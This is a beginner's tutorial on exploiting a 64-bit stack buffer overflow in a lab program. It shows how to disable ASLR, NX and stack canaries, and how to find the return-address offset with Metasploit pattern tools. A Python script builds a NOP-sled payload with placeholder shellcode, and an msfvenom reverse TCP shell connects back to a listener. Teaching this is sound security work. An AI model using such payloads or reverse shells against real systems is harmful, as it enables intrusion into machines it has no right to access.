A beginner’s guide to buffer overflow.
What is a buffer and a buffer overflow?
A buffer is a contiguous section of memory that stores some data. The problem arises when we try to put more data into the buffer than it can accommodate. When a program writes past the end of a buffer, it overwrites the adjacent memory locations, which often results in a crash. This is known as a buffer overflow. Merely overflowing a buffer and crashing a program is of little interest to an attacker. The real concern is how to overflow the buffer in a way that runs commands in the context of the vulnerable program.
Creating a buffer is very simple: one just needs to declare an array of a given size. An example in C could be the following.
char buffer[100];
What is a Stack?
A stack is a LIFO (Last In First Out) data structure. There are two operations associated with it. The “PUSH” operation puts an object on the “TOP” of the stack and the “POP” operation removes an object from the “TOP” of the stack. A stack is used during function calls to create the stack frame associated with each call. The stack also stores the “return address” of the function, which is the address to which control should be passed when the function returns.
The above figure depicts a sample stack layout when one function calls another. The function arguments are pushed on the stack, followed by the “return address” (the value of register rip at the time of the call) and the “frame/base pointer” (the value in register rbp), which points to the base of the previous stack frame. Note that on a 64-bit architecture, under the System V AMD64 calling convention used by Linux, the first six integer or pointer arguments are passed in registers rather than pushed on the stack, whereas on a 32-bit architecture all the function arguments are typically pushed on the stack. More information on 64-bit stack frames can be found here.
Whenever a function returns, the “saved return address” is popped from the stack and loaded into register rip, and execution continues from that address. In a typical buffer overflow, the goal is to overwrite the “saved return address” on the stack with another address that points to some executable instructions (shellcode) which spawn a shell.
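To make the layout concrete, here is a minimal Python sketch that models a stack frame as a byte array: a buffer, followed by the saved frame pointer and the saved return address. The buffer size, the addresses and the helper names are hypothetical and chosen only for illustration. It is a simulation of the idea, not of a real process.

```python
import struct

BUF_SIZE = 16  # hypothetical buffer size, kept small for readability


def build_frame(buf_size, saved_rbp, ret_addr):
    """Model a frame: [buffer][saved rbp][saved return address]."""
    return bytearray(buf_size) + bytearray(struct.pack("<QQ", saved_rbp, ret_addr))


def unchecked_copy(frame, data):
    """Copy data to the start of the frame without checking the buffer size,
    which is what an unsafe C copy routine effectively does."""
    frame[0:len(data)] = data
    return frame


def read_control_data(frame, buf_size):
    """Return (saved rbp, saved return address) as stored after the buffer."""
    return struct.unpack_from("<QQ", frame, buf_size)


# Hypothetical original values of the saved rbp and the return address.
frame = build_frame(BUF_SIZE, 0x7FFFFFFFE100, 0x401136)

# 16 bytes fill the buffer, 8 more clobber saved rbp, 8 more replace the return address.
attack = b"A" * BUF_SIZE + b"B" * 8 + struct.pack("<Q", 0x7FFFFFFFDF00)
unchecked_copy(frame, attack)

saved_rbp, ret_addr = read_control_data(frame, BUF_SIZE)
print(hex(saved_rbp), hex(ret_addr))
```

After the copy, the saved frame pointer holds the filler bytes and the return address holds the attacker-chosen value, which is exactly the situation the rest of this guide builds towards.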
Setting up the environment
The setup consists of a 64-bit Kali Linux VM and a vulnerable C program. Many protection mechanisms exist to mitigate buffer overflow attacks. For this basic overflow, we are going to disable these mechanisms.
Note: For building 32-bit binaries, the “gcc-multilib” package needs to be installed on 64-bit Kali Linux. The “-m32” flag can be passed to gcc in order to create a 32-bit binary.
gcc bof_demo.c -o bof_demo_x86 -m32
Address Space Layout Randomization (ASLR): It is a mechanism which randomly arranges the address space of a process. More information about ASLR can be found here.
On a Linux distribution, ASLR can be disabled by running the following command from a root terminal.
echo 0 > /proc/sys/kernel/randomize_va_space
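To confirm the setting took effect, the same file can be read back. The following is a small Python sketch. The helper names are made up for this example, and the descriptions of the three values are a paraphrase of the kernel's behaviour rather than official wording.

```python
from pathlib import Path

# Meaning of the values accepted by /proc/sys/kernel/randomize_va_space.
ASLR_MODES = {
    0: "disabled",
    1: "conservative (stack, mmap regions and shared libraries are randomized)",
    2: "full (conservative mode plus heap randomization)",
}


def describe_aslr(raw):
    """Translate the raw file content (for example '0\\n') into a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")


def read_aslr_setting(path="/proc/sys/kernel/randomize_va_space"):
    """Read the current setting from the running Linux kernel."""
    return describe_aslr(Path(path).read_text())
```

Calling `read_aslr_setting()` on the Kali VM should report "disabled" after the echo command above has been run.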
Data Execution Prevention (DEP)/NX/XD: It disables the execution of code in memory pages which are marked non-executable. More information can be found here.
The stack can be marked as executable by passing the flag “-z execstack” with gcc during compilation.
gcc bof_demo.c -z execstack -o bof_demo
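One can use the “readelf” command in Linux to check if the stack is marked executable. In the output, the “GNU_STACK” program header shows the flags “RWE” when the stack is executable and “RW” when it is not.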
readelf -l bof_demo
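The same check can be scripted. The sketch below reads the program headers of a little-endian 64-bit ELF file directly and looks for the executable bit on the GNU_STACK entry. The function name is hypothetical, and the code deliberately handles only the ELF64 little-endian case used in this guide.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type used for the stack permissions
PF_X = 0x1                 # "executable" bit in the p_flags field


def stack_is_executable(elf_bytes):
    """Return True/False for the GNU_STACK flags, or None if the header is absent."""
    if elf_bytes[:4] != b"\x7fELF" or elf_bytes[4] != 2 or elf_bytes[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    # ELF64 header fields: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38.
    (e_phoff,) = struct.unpack_from("<Q", elf_bytes, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf_bytes, 0x36)
    for index in range(e_phnum):
        # Each ELF64 program header starts with p_type and p_flags (4 bytes each).
        p_type, p_flags = struct.unpack_from("<II", elf_bytes, e_phoff + index * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None
```

A possible use is `stack_is_executable(open("bof_demo", "rb").read())`, which should return True for a binary built with “-z execstack”.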
Stack Canaries/Cookies: These are known values placed between the buffer and the control data (the saved frame pointer and the return address) in order to detect a buffer overflow attack. If the value has changed by the time the function returns, the program aborts. More information can be found here.
Stack canaries can be disabled by passing the flag “-fno-stack-protector” to gcc during compilation. Some gcc builds leave canaries off by default, but others (as shipped by certain distributions) enable them unless this flag is passed explicitly, so it is safest to always pass it.
gcc bof_demo.c -o bof_demo -fno-stack-protector
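To illustrate what the canary protects against, here is a small Python simulation of a frame with a canary placed between the buffer and the control data. The layout, sizes and helper names are assumptions made for this sketch. The leading zero byte of the canary imitates a common convention and is likewise an assumption, not something taken from the demo binary.

```python
import os
import struct


def make_frame(buf_size, canary, saved_rbp, ret_addr):
    """Model a protected frame: [buffer][canary][saved rbp][return address]."""
    return bytearray(buf_size) + bytearray(canary) + bytearray(struct.pack("<QQ", saved_rbp, ret_addr))


def canary_intact(frame, buf_size, canary):
    """The check performed before returning: is the canary still unchanged?"""
    return bytes(frame[buf_size:buf_size + len(canary)]) == canary


BUF_SIZE = 16                      # hypothetical buffer size
canary = b"\x00" + os.urandom(7)   # random value with a leading zero byte (assumed convention)

frame = make_frame(BUF_SIZE, canary, 0x7FFFFFFFE100, 0x401136)
frame[0:BUF_SIZE] = b"A" * BUF_SIZE
print(canary_intact(frame, BUF_SIZE, canary))   # write stays inside the buffer

frame[0:BUF_SIZE + 8] = b"A" * (BUF_SIZE + 8)
print(canary_intact(frame, BUF_SIZE, canary))   # write runs over the canary
```

An overflow that reaches the return address must pass through the canary first, which is why the check fails in the second case.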
Copy the following vulnerable code and save it as “bof_demo.c”
Compiling the above code
gcc bof_demo.c -o bof_demo -z execstack -fno-stack-protector
Fuzzing
In order to overflow the buffer and change the value of “return address” which is stored in the stack, one needs to find the exact offset. But wait! Before overflowing the buffer and overwriting the “return address” we should know what endianness and canonical address are.
Endianness refers to the organization of bytes in memory. It is of two types: little endian and big endian. In a little endian machine, the least significant byte is stored in the lower address and the most significant byte in the higher addresses whereas in a big endian machine, the most significant byte is stored in the lower address and the least significant byte in the higher addresses.
One can find if the system is little endian or big endian by running the following C program. Also, the command “lscpu” can be used in Linux distributions to check for endianness.
More information on endianness can be found here.
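As a rough Python counterpart to the check described above, the sketch below packs the same 64-bit value in both byte orders and then tests the byte order of the host. The sample value and the function name are chosen only for illustration.

```python
import struct
import sys

value = 0x0102030405060708  # sample value whose bytes are easy to tell apart

little = struct.pack("<Q", value)  # least significant byte first
big = struct.pack(">Q", value)     # most significant byte first

print(little.hex())  # 0807060504030201
print(big.hex())     # 0102030405060708


def host_is_little_endian():
    """Pack the number 1 in native byte order and look at the first byte."""
    return struct.pack("=H", 1)[0] == 1


print(host_is_little_endian(), sys.byteorder)
```

On an x86-64 machine such as the Kali VM used here, the last line should report a little endian host.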
In a 64-bit architecture, not all of the 2⁶⁴ possible addresses are used. In a typical 48-bit implementation, a canonical address is one in the range 0x0000000000000000 to 0x00007FFFFFFFFFFF or 0xFFFF800000000000 to 0xFFFFFFFFFFFFFFFF, that is, an address whose upper 16 bits are copies of bit 47. Any address outside these ranges is non-canonical.
More information on canonical addresses can be found here and here.
In a 32-bit architecture, whenever a buffer is overflowed, the register eip gets loaded with the overwritten “saved return address” from the stack. That is not the case on a 64-bit architecture, where the register rip can only be loaded with a canonical address: returning to a non-canonical address raises a fault before rip is updated. Since 0x4141414141414141 (‘A’ = 0x41) doesn’t fall in the required range, it never gets loaded into register rip.
So, how do we find the correct offset? Simple! The register rbp can be used to calculate the offset, because the saved frame pointer is restored into rbp just before the function returns and is therefore overwritten with our payload. This can be observed in the following figure.
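The canonical address rule can be checked with a few lines of Python. This is a minimal sketch assuming the 48-bit implementation described above. The function name and the `bits` parameter are introduced here for illustration.

```python
def is_canonical(addr, bits=48):
    """An address is canonical when bit (bits - 1) and all higher bits are equal."""
    top = addr >> (bits - 1)                 # bit 47 and everything above it
    all_ones = (1 << (64 - bits + 1)) - 1    # 17 one-bits for a 48-bit implementation
    return top == 0 or top == all_ones


for addr in (0x00007FFFFFFFFFFF, 0x0000800000000000,
             0xFFFF800000000000, 0x4141414141414141):
    print(hex(addr), is_canonical(addr))
```

The filler value 0x4141414141414141 is reported as non-canonical, which matches the behaviour observed with register rip.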
Now, let’s find out the starting address of our buffer using gdb.
Note down any address from the above where our buffer is filled with A’s. Prefer addresses which are close to the start of the buffer. This address will be used later as the value of rip in the final exploit.
Using Metasploit’s “pattern_create.rb” script, let’s create a string of length 1000 and redirect the output to a file “fuzz_rbp.in” by typing the following.
`locate pattern_create` -l 1000 > fuzz_rbp.in
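The idea behind such a pattern is that every short window of it is unique, so a value found in a register identifies its own position in the input. The following Python sketch is a simplified re-implementation of that idea (an uppercase letter, a lowercase letter and a digit, repeated) and is not Metasploit's own code. The function names simply mirror the script names.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Build a non-repeating pattern of the form Aa0Aa1Aa2...Ab0Ab1..."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(register_value, length=1000):
    """Find where the 8 bytes seen in a 64-bit register occur in the pattern.
    The register value is converted back to little endian memory order first."""
    needle = struct.pack("<Q", register_value)
    return pattern_create(length).find(needle)


print(pattern_create(12))
```

Given the value read from a register after the crash, `pattern_offset` returns the number of bytes that precede it in the input, or -1 if the value is not part of the pattern.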
Using the value of register rbp let’s calculate the offset
Start gdb and debug the program. Now, run the program with the “run” command (shortcut ‘r’) and redirect the input from the “fuzz_rbp.in” file created above. Print the value of register rbp at the gdb prompt. This is shown in the following figure.
Note the value stored in register rbp and query it with Metasploit’s “pattern_offset.rb” script as shown in the above figure. The result shows that the “saved frame/base pointer” starts at offset 608, so it is overwritten once we write past 608 bytes. Since addresses are 8 bytes wide on a 64-bit machine, 608+8=616 bytes need to be written to overwrite the “saved frame/base pointer” completely. The “saved return address” lies just above it, so 616+8=624 bytes are required to overwrite the “saved return address” as well. Remember that only a canonical address can be used to overwrite it, and that it must be written in little endian byte order because this machine is little endian.
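The arithmetic above can be written down as a short Python sketch. The offset 608 is the value reported in this walkthrough, while the function and key names are made up for the example.

```python
def frame_offsets(saved_rbp_offset, pointer_size=8):
    """Derive the offsets that matter from the offset of the saved frame pointer."""
    ret_offset = saved_rbp_offset + pointer_size   # return address follows saved rbp
    total_length = ret_offset + pointer_size       # bytes needed to replace it fully
    return {
        "saved_rbp": saved_rbp_offset,
        "return_address": ret_offset,
        "payload_length": total_length,
    }


print(frame_offsets(608))
# {'saved_rbp': 608, 'return_address': 616, 'payload_length': 624}
```

So the first 616 bytes of input are filler (or shellcode) and bytes 616 to 623 hold the new return address.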
Final payload
Since we now control the value of register rip, we can make the program do something meaningful, like spawning a shell.
Let’s use “msfvenom” to create a reverse TCP shellcode as shown in the figure.
Now, it’s time to create the final payload with python. Copy the following python snippet and save it as “bof_demo_exploit.py”.
Note: In the following script, the value of rip is the one which is obtained above while determining the starting address of the buffer.
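A minimal sketch of such a script, assuming Python 3, might look like the following. The offset 616 comes from the calculation above. The address in `RIP`, the padding length and the `SHELLCODE` bytes are placeholders that must be replaced with the address noted in gdb and the msfvenom output. Whether the two zero bytes of the packed address survive depends on how the vulnerable program reads its input.

```python
import struct

RET_OFFSET = 616               # offset of the saved return address (from the steps above)
RIP = 0x7FFFFFFFDE90           # hypothetical address inside the buffer, taken from gdb
PADDING_LEN = 40               # hypothetical gap between shellcode and return address
SHELLCODE = b"\xcc" * 74       # stand-in bytes; paste the msfvenom shellcode here


def build_payload(ret_offset, shellcode, rip, padding_len):
    """Lay out [NOP slide][shellcode][padding][new return address]."""
    nop_len = ret_offset - len(shellcode) - padding_len
    if nop_len < 0:
        raise ValueError("shellcode and padding do not fit before the return address")
    return (
        b"\x90" * nop_len            # NOP slide
        + shellcode
        + b"A" * padding_len         # keeps the shellcode away from the saved rbp area
        + struct.pack("<Q", rip)     # 8-byte address in little endian order
    )


payload = build_payload(RET_OFFSET, SHELLCODE, RIP, PADDING_LEN)
```

To use it as a script, finish with `sys.stdout.buffer.write(payload)` (after `import sys`) so that the raw bytes, rather than their text representation, are written to standard output.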
In the above script, Python’s struct module has been used to convert the address to little endian byte order. NOP slides (also called NOP sleds) are used to increase the chances of hitting the “shellcode”. If register rip points to any address that holds a NOP (No Operation), the CPU simply moves on to the next instruction. The bigger the NOP slide, the greater the chance that our guessed value for rip lands on a NOP and execution eventually reaches the shellcode.
Some padding has also been placed just before the overwritten “return address” to ensure that there is a gap between the shellcode and the “return address”. This was necessary because some bytes near the “saved frame/base pointer” were not overwritten. So, if the shellcode extends up to the “saved frame/base pointer”, it will not execute properly. This is described in the following figure.
Start a listener in Metasploit for the above payload.
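The effect of the NOP slide can be illustrated with a tiny Python simulation that follows NOP bytes from a guessed landing position and reports whether execution would slide into the start of the shellcode. The sizes and the stand-in shellcode bytes are hypothetical.

```python
NOP = 0x90


def reaches_shellcode(payload, start, shellcode_offset):
    """Follow NOPs from `start`; True if execution arrives at shellcode_offset."""
    pos = start
    while pos < shellcode_offset and payload[pos] == NOP:
        pos += 1
    return pos == shellcode_offset


# Hypothetical layout: 100 NOPs, 20 bytes of stand-in shellcode, 10 bytes of padding.
with_slide = b"\x90" * 100 + b"\xcc" * 20 + b"A" * 10
without_slide = b"A" * 100 + b"\xcc" * 20 + b"A" * 10

good_with = sum(reaches_shellcode(with_slide, s, 100) for s in range(len(with_slide)))
good_without = sum(reaches_shellcode(without_slide, s, 100) for s in range(len(without_slide)))
print(good_with, good_without)  # 101 1
```

With the slide, any of 101 landing positions works. Without it, only the exact start of the shellcode does, which is why a longer slide tolerates a less precise guess for rip.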
Now, run the “bof_demo_exploit.py” file created earlier, and pipe the output to the “bof_demo” binary as shown in the following figure.
Finally, it can be seen that a reverse connection is established when the payload is used.
The related files for the demo can be found here.
Hope you all enjoyed reading!!